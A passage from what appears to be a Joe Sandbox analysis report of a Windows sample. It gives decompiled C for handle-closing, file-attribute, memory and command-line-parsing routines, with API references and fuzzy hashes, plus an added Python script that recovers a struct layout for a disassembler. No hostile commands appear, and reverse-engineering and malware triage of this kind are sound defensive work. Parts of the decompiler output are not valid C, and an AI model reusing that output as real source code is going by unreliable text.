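```

Run against the full report text, `calls_by_subcall` gives a quick callee-to-API index (here: 001344B9 owns LoadStringA and MessageBoxA, 00136285 owns GetLastError), which is what you want when deciding which of the thousands of listed functions deserve a look in the disassembler.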

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                     			E00134B60(signed int _a4) {   // _a4: index into a table of 0x18-byte records starting at 0x138d60
                                                                                                                                                                                                     				signed int _t9;
                                                                                                                                                                                                     				signed int _t15;
                                                                                                                                                                                                     
                                                                                                                                                                                                     				_t15 = _a4 * 0x18;   // record offset; the stride covers six 32-bit slots at +0x00..+0x14
                                                                                                                                                                                                     				if( *((intOrPtr*)(_t15 + 0x138d64)) != 1) {   // slot +0x04: when it is not 1 the record owns an OS handle
                                                                                                                                                                                                     					// slot +0x14 is the handle. FindCloseChangeNotification shares its KERNELBASE export address with CloseHandle,
                                                                                                                                                                                                     					// so the label most likely stands for a plain CloseHandle call.
                                                                                                                                                                                                     					_t9 = FindCloseChangeNotification( *(_t15 + 0x138d74)); // executed
                                                                                                                                                                                                     					if(_t9 == 0) {
                                                                                                                                                                                                     						return _t9 | 0xffffffff;   // close failed: return -1
                                                                                                                                                                                                     					}
                                                                                                                                                                                                     					 *((intOrPtr*)(_t15 + 0x138d60)) = 1;   // slot +0x00: mark the record released
                                                                                                                                                                                                     					return 0;
                                                                                                                                                                                                     				}
                                                                                                                                                                                                     				 *((intOrPtr*)(_t15 + 0x138d60)) = 1;   // no handle to close: release and clear slots +0x08, +0x10, +0x0c
                                                                                                                                                                                                     				 *((intOrPtr*)(_t15 + 0x138d68)) = 0;
                                                                                                                                                                                                     				 *((intOrPtr*)(_t15 + 0x138d70)) = 0;
                                                                                                                                                                                                     				 *((intOrPtr*)(_t15 + 0x138d6c)) = 0;
                                                                                                                                                                                                     				return 0;
                                                                                                                                                                                                     			}
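The decompiler shows E00134B60 as raw arithmetic on absolute constants (`_a4 * 0x18 + 0x138d60 ... 0x138d74`), which is the usual way an array of fixed-size records surfaces before any types are applied. The Python below is an added example, not from the report or from the sample: it turns those constants into an array base plus in-record offsets, renders a C struct that can be pasted into the disassembler's type editor, builds an equivalent ctypes view, and re-expresses the function's two branches over that view so they can be exercised against a stand-in for the close API. The page supports only the offsets, the stride, and that slot +0x14 is handed to FindCloseChangeNotification; the field names are positional and the usage notes are our reading of the decompiled code.

```python
import ctypes
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

# Accesses read off the decompiled E00134B60: (absolute constant added to
# _a4 * 0x18, access width in bytes, how the function uses the slot).
# The offsets and stride are the decompiler's; the notes are ours.
E00134B60_ACCESSES = [
    (0x138d60, 4, "set to 1 when the record is released"),
    (0x138d64, 4, "compared with 1: selects the no-handle path"),
    (0x138d68, 4, "zeroed on the no-handle path"),
    (0x138d6c, 4, "zeroed on the no-handle path"),
    (0x138d70, 4, "zeroed on the no-handle path"),
    (0x138d74, 4, "passed to FindCloseChangeNotification (a HANDLE)"),
]
E00134B60_STRIDE = 0x18


@dataclass
class Field:
    offset: int
    size: int
    note: str


def recover_layout(accesses, stride: int) -> Tuple[int, List[Field]]:
    """Split 'absolute + idx*stride' constants into the array base and in-record offsets."""
    base = min(addr for addr, _, _ in accesses)
    fields = []
    for addr, size, note in sorted(accesses):
        off = addr - base
        if off + size > stride:          # an access past the stride means the base or stride is wrong
            raise ValueError(f"access at +0x{off:x} crosses the 0x{stride:x} record stride")
        fields.append(Field(off, size, note))
    return base, fields


def to_c_struct(name: str, fields: List[Field], stride: int) -> str:
    """Render the layout as C with explicit padding, for an IDA/Ghidra type import."""
    ctype = {1: "uint8_t", 2: "uint16_t", 4: "uint32_t", 8: "uint64_t"}
    lines, cursor = [f"struct {name} {{"], 0
    for f in fields:
        if f.offset > cursor:
            lines.append(f"    uint8_t pad_{cursor:02x}[0x{f.offset - cursor:x}];")
        lines.append(f"    {ctype[f.size]} f_{f.offset:02x}; /* {f.note} */")
        cursor = f.offset + f.size
    if cursor < stride:
        lines.append(f"    uint8_t tail[0x{stride - cursor:x}];")
    lines.append(f"}}; /* sizeof == 0x{stride:x} */")
    return "\n".join(lines)


def to_ctypes(name: str, fields: List[Field], stride: int):
    """Same layout as a packed ctypes.Structure whose sizeof equals the stride."""
    width = {1: ctypes.c_uint8, 2: ctypes.c_uint16, 4: ctypes.c_uint32, 8: ctypes.c_uint64}
    members, cursor = [], 0
    for f in fields:
        if f.offset > cursor:
            members.append((f"pad_{cursor:02x}", ctypes.c_uint8 * (f.offset - cursor)))
        members.append((f"f_{f.offset:02x}", width[f.size]))
        cursor = f.offset + f.size
    if cursor < stride:
        members.append(("tail", ctypes.c_uint8 * (stride - cursor)))
    return type(name, (ctypes.Structure,), {"_pack_": 1, "_fields_": members})


def ctypes_offsets(struct_type) -> Tuple[int, Dict[str, int]]:
    """(sizeof, {field: offset}) so the generated type can be checked against the decompiler."""
    return ctypes.sizeof(struct_type), {n: getattr(struct_type, n).offset for n, _ in struct_type._fields_}


def close_record(table, idx: int, close_handle: Callable[[int], bool]) -> int:
    """E00134B60 re-expressed over the recovered struct; returns 0 or -1 as the original does.
    close_handle stands in for FindCloseChangeNotification/CloseHandle (returns False on failure)."""
    rec = table[idx]
    if rec.f_04 != 1:                    # record owns an OS handle
        if not close_handle(rec.f_14):
            return -1
        rec.f_00 = 1
        return 0
    rec.f_00 = 1                         # no handle: release and clear the three bookkeeping slots
    rec.f_08 = rec.f_0c = rec.f_10 = 0
    return 0


if __name__ == "__main__":
    base, fields = recover_layout(E00134B60_ACCESSES, E00134B60_STRIDE)
    print(f"array base 0x{base:x}")
    print(to_c_struct("HandleRecord", fields, E00134B60_STRIDE))
```

Once the struct is applied at 0x138d60 in the disassembler, every other function that indexes the same table with a 0x18 stride decompiles to named fields, which is usually how the meaning of slots +0x04, +0x08, +0x0c and +0x10 gets pinned down.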

                                                                                                                                                                                                     Instruction addresses for the decompiled lines above, in listing order: 0x00134b66, 0x00134b74, 0x00134b98, 0x00134ba0, 0x00000000, 0x00134bac, 0x00134ba4, 0x00000000, 0x00134ba4, 0x00134b78, 0x00134b7e, 0x00134b84, 0x00134b8a, 0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00134FA1,00000000), ref: 00134B98
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                                    • Opcode ID: 36e7028b48b822d9a5b9878cd43258053758ae470ac90c86254aa7e1c545c231
                                                                                                                                                                                                    • Instruction ID: 1fcc030f74f7c6794331f26af0433070f520ffb755a39293b7721f51f997b7c4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36e7028b48b822d9a5b9878cd43258053758ae470ac90c86254aa7e1c545c231
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EAF01C31500B089FD7759FBADC00652FBE8AFB5375750092EB4AED2198EB30A841CB90
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 100%
E001366AE(CHAR* __ecx) {
	unsigned int _t1;

	_t1 = GetFileAttributesA(__ecx); // executed; the path pointer is passed in ECX
	if(_t1 != 0xffffffff) { // 0xffffffff is INVALID_FILE_ATTRIBUTES (path missing or inaccessible)
		// '!' binds tighter than '&': this is 1 only when _t1 < 0x10, i.e. no attribute bit
		// at or above FILE_ATTRIBUTE_DIRECTORY (0x10) is set
		return  !(_t1 >> 4) & 0x00000001;
	} else {
		return 0;
	}
}


APIs
• GetFileAttributesA.KERNELBASE(?,00134777,?,00134E38,?), ref: 001366B1
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: c2dd004a7364d12284a89d7d7115ccdfc6cafb7082ff45f97d8f570efde31de9
• Instruction ID: 5629acd82d97ff48f62a1f14d191b46136bb7c0b7a3b84d1569b289207516041
• Opcode Fuzzy Hash: c2dd004a7364d12284a89d7d7115ccdfc6cafb7082ff45f97d8f570efde31de9
• Instruction Fuzzy Hash: 81B092B622244052AA2406726C2A5562845ABC123ABE45B90F032C15E0CB3EC886D004
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00134CA0(long _a4) {
	void* _t2;

	_t2 = GlobalAlloc(0, _a4); // executed; flags 0 == GMEM_FIXED, _a4 is the byte count
	return _t2; // handle/pointer to the block, or NULL on failure
}


APIs
• GlobalAlloc.KERNELBASE(00000000,?), ref: 00134CAA
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: 9d850a1f3ee5fe9cd9e973e6eb101b8b93d72dc332028ac31ec3918ba2ce6738
• Instruction ID: 5ed2ed67791fdcab57c497ece72201ef593e79e17fc9552bcc07dc56c805fea6
• Opcode Fuzzy Hash: 9d850a1f3ee5fe9cd9e973e6eb101b8b93d72dc332028ac31ec3918ba2ce6738
• Instruction Fuzzy Hash: 36B0123204430CB7CF001FC2EC09F853F1DEBC4761F540000F60C454508A7294508696
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00134CC0(void* _a4) {
	void* _t2;

	_t2 = GlobalFree(_a4); // executed; releases a block obtained from GlobalAlloc
	return _t2; // NULL on success, the original handle on failure
}


APIs
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: FreeGlobal
• String ID:
• API String ID: 2979337801-0
• Opcode ID: b87e75f88433181564d3fa9407f988e16cba30b7001308a41d76c60f01733b4a
• Instruction ID: 550eac4822aba8da43fdabf03ed74abb9bbcceace69ba910aee45302618d92be
• Opcode Fuzzy Hash: b87e75f88433181564d3fa9407f988e16cba30b7001308a41d76c60f01733b4a
• Instruction Fuzzy Hash: 19B0123100010CB7CF001B42EC088453F1DDBC02607400010F50C414218B3398518585
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 92%
E00135C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
	signed int _v8;
	signed int _v12;
	CHAR* _v265;
	char _v266;
	char _v267;
	char _v268;
	CHAR* _v272;
	char _v276;
	signed int _v296;
	char _v556;
	signed int _t61;
	int _t63;
	char _t67;
	CHAR* _t69;
	signed int _t71;
	void* _t75;
	char _t79;
	void* _t83;
	void* _t85;
	void* _t87;
	intOrPtr _t88;
	void* _t100;
	intOrPtr _t101;
	CHAR* _t104;
	intOrPtr _t105;
	void* _t111;
	void* _t115;
	CHAR* _t118;
	void* _t119;
	void* _t127;
	CHAR* _t129;
	void* _t132;
	void* _t142;
	signed int _t143;
	CHAR* _t144;
	void* _t145;
	void* _t146;
	void* _t147;
	void* _t149;
	char _t155;
	void* _t157;
	void* _t162;
                                                                                                                                                                                                    				void* _t163;
                                                                                                                                                                                                    				char _t167;
                                                                                                                                                                                                    				char _t170;
                                                                                                                                                                                                    				CHAR* _t173;
                                                                                                                                                                                                    				void* _t177;
                                                                                                                                                                                                    				intOrPtr* _t183;
                                                                                                                                                                                                    				intOrPtr* _t192;
                                                                                                                                                                                                    				CHAR* _t199;
                                                                                                                                                                                                    				void* _t200;
                                                                                                                                                                                                    				CHAR* _t201;
                                                                                                                                                                                                    				void* _t205;
                                                                                                                                                                                                    				void* _t206;
                                                                                                                                                                                                    				int _t209;
                                                                                                                                                                                                    				void* _t210;
                                                                                                                                                                                                    				void* _t212;
                                                                                                                                                                                                    				void* _t213;
                                                                                                                                                                                                    				CHAR* _t218;
                                                                                                                                                                                                    				intOrPtr* _t219;
                                                                                                                                                                                                    				intOrPtr* _t220;
                                                                                                                                                                                                    				signed int _t221;
                                                                                                                                                                                                    				signed int _t223;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t173 = __ecx;
                                                                                                                                                                                                    				_t61 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                    				_push(__ebx);
                                                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                                                    				_push(__edi);
                                                                                                                                                                                                    				_t209 = 1;
                                                                                                                                                                                                    				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                    					_t63 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					while(_t209 != 0) {
                                                                                                                                                                                                    						_t67 =  *_t173;
                                                                                                                                                                                                    						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                    							_t173 = CharNextA(_t173);
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v272 = _t173;
                                                                                                                                                                                                    						if(_t67 == 0) {
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t69 = _v272;
                                                                                                                                                                                                    							_t177 = 0;
                                                                                                                                                                                                    							_t213 = 0;
                                                                                                                                                                                                    							_t163 = 0;
                                                                                                                                                                                                    							_t202 = 1;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								if(_t213 != 0) {
                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										goto L21;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t69 =  *_t69;
                                                                                                                                                                                                    									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t69 = _v272;
                                                                                                                                                                                                    										L21:
                                                                                                                                                                                                    										_t155 =  *_t69;
                                                                                                                                                                                                    										if(_t155 != 0x22) {
                                                                                                                                                                                                    											if(_t202 >= 0x104) {
                                                                                                                                                                                                    												goto L106;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                    												_t177 = _t177 + 1;
                                                                                                                                                                                                    												_t202 = _t202 + 1;
                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											if(_v272[1] == 0x22) {
                                                                                                                                                                                                    												if(_t202 >= 0x104) {
                                                                                                                                                                                                    													L106:
                                                                                                                                                                                                    													_t63 = 0;
                                                                                                                                                                                                    													L125:
                                                                                                                                                                                                    													_pop(_t210);
                                                                                                                                                                                                    													_pop(_t212);
                                                                                                                                                                                                    													_pop(_t162);
                                                                                                                                                                                                    													return E00136CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                    													_t177 = _t177 + 1;
                                                                                                                                                                                                    													_t202 = _t202 + 1;
                                                                                                                                                                                                    													_t157 = 2;
                                                                                                                                                                                                    													goto L30;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                    												if(_t213 != 0) {
                                                                                                                                                                                                    													_t163 = 1;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t213 = 1;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L131;
                                                                                                                                                                                                    								L30:
                                                                                                                                                                                                    								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                    								_t69 = _v272;
                                                                                                                                                                                                    							} while ( *_t69 != 0);
                                                                                                                                                                                                    							if(_t177 >= 0x104) {
                                                                                                                                                                                                    								E00136E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                    								asm("int3");
                                                                                                                                                                                                    								_push(_t221);
                                                                                                                                                                                                    								_t222 = _t223;
                                                                                                                                                                                                    								_t71 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                    								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                    									0x4f0 = 2;
                                                                                                                                                                                                    									_t75 = E0013597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E001344B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                    									 *0x139124 = E00136285();
                                                                                                                                                                                                    									_t75 = 0;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								return E00136CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                    								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E001344B9(0, 0x521, 0x131140, 0, 0x40, 0);
												_t85 =  *0x138588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0013667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0013667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00135C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00131680(0x138c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0013667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0013667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x138a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00135C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x138b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x138a3a;
																}
																E00131680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0013658A(_t218, 0x104, 0x131140);
																if(E001331E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x138a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x138a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x138a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x138a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
                                                                                                                                                                                                    																		goto L76;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		if(_t129 == 0x41) {
                                                                                                                                                                                                    																			goto L83;
                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                    																			if(_t129 == 0x55) {
                                                                                                                                                                                                    																				goto L76;
                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                    																				goto L49;
                                                                                                                                                                                                    																			}
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																L76:
                                                                                                                                                                                                    																_push(2);
                                                                                                                                                                                                    																_pop(1);
                                                                                                                                                                                                    																L83:
                                                                                                                                                                                                    																 *0x138a38 = 1;
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    															goto L50;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t132 = _t127 - 1;
                                                                                                                                                                                                    															if(_t132 == 0) {
                                                                                                                                                                                                    																if(_v266 != 0) {
                                                                                                                                                                                                    																	if(_v266 != 0x3a) {
                                                                                                                                                                                                    																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                    																			goto L49;
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		_t201 = _v265;
                                                                                                                                                                                                    																		 *0x139a2c = 1;
                                                                                                                                                                                                    																		if(_t201 != 0) {
                                                                                                                                                                                                    																			_t220 =  &_v265;
                                                                                                                                                                                                    																			do {
                                                                                                                                                                                                    																				_t220 = _t220 + 1;
                                                                                                                                                                                                    																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                    																				if(_t142 == 0) {
                                                                                                                                                                                                    																					_t143 = 2;
                                                                                                                                                                                                    																					 *0x139a2c =  *0x139a2c | _t143;
                                                                                                                                                                                                    																					goto L70;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t145 = _t142 - 3;
                                                                                                                                                                                                    																					if(_t145 == 0) {
                                                                                                                                                                                                    																						 *0x138d48 =  *0x138d48 | 0x00000040;
                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                    																						_t146 = _t145 - 5;
                                                                                                                                                                                                    																						if(_t146 == 0) {
                                                                                                                                                                                                    																							 *0x139a2c =  *0x139a2c & 0xfffffffd;
                                                                                                                                                                                                    																							goto L70;
                                                                                                                                                                                                    																						} else {
                                                                                                                                                                                                    																							_t147 = _t146 - 5;
                                                                                                                                                                                                    																							if(_t147 == 0) {
                                                                                                                                                                                                    																								 *0x139a2c =  *0x139a2c & 0xfffffffe;
                                                                                                                                                                                                    																								goto L70;
                                                                                                                                                                                                    																							} else {
                                                                                                                                                                                                    																								_t149 = _t147;
                                                                                                                                                                                                    																								if(_t149 == 0) {
                                                                                                                                                                                                    																									 *0x138d48 =  *0x138d48 | 0x00000080;
                                                                                                                                                                                                    																								} else {
                                                                                                                                                                                                    																									if(_t149 == 3) {
                                                                                                                                                                                                    																										 *0x139a2c =  *0x139a2c | 0x00000004;
                                                                                                                                                                                                    																										L70:
                                                                                                                                                                                                    																										 *0x138a28 = 1;
                                                                                                                                                                                                    																									} else {
                                                                                                                                                                                                    																										_t209 = 0;
                                                                                                                                                                                                    																									}
                                                                                                                                                                                                    																								}
                                                                                                                                                                                                    																							}
                                                                                                                                                                                                    																						}
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				_t144 =  *_t220;
                                                                                                                                                                                                    																				_t201 = _t144;
                                                                                                                                                                                                    																			} while (_t144 != 0);
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	 *0x139a2c = 3;
                                                                                                                                                                                                    																	 *0x138a28 = 1;
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    																goto L50;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																if(_t132 == 0) {
                                                                                                                                                                                                    																	goto L98;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	L49:
                                                                                                                                                                                                    																	_t209 = 0;
                                                                                                                                                                                                    																	L50:
                                                                                                                                                                                                    																	_t173 = _v272;
                                                                                                                                                                                                    																	if( *_t173 != 0) {
                                                                                                                                                                                                    																		goto L2;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		break;
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L106;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										L34:
                                                                                                                                                                                                    										_t209 = 0;
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L131;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if( *0x138a2c != 0 &&  *0x138b3e == 0) {
                                                                                                                                                                                                    						if(GetModuleFileNameA( *0x139a3c, 0x138b3e, 0x104) == 0) {
                                                                                                                                                                                                    							_t209 = 0;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t202 = 0x5c;
                                                                                                                                                                                                    							 *((char*)(E001366C8(0x138b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t63 = _t209;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L131:
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x00135d00
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d06
                                                                                                                                                                                                    0x00135d06
                                                                                                                                                                                                    0x00135d0e
                                                                                                                                                                                                    0x00135d10
                                                                                                                                                                                                    0x00135d12
                                                                                                                                                                                                    0x00135d14
                                                                                                                                                                                                    0x00135d15
                                                                                                                                                                                                    0x00135d17
                                                                                                                                                                                                    0x00135d49
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d19
                                                                                                                                                                                                    0x00135d19
                                                                                                                                                                                                    0x00135d1d
                                                                                                                                                                                                    0x00000000
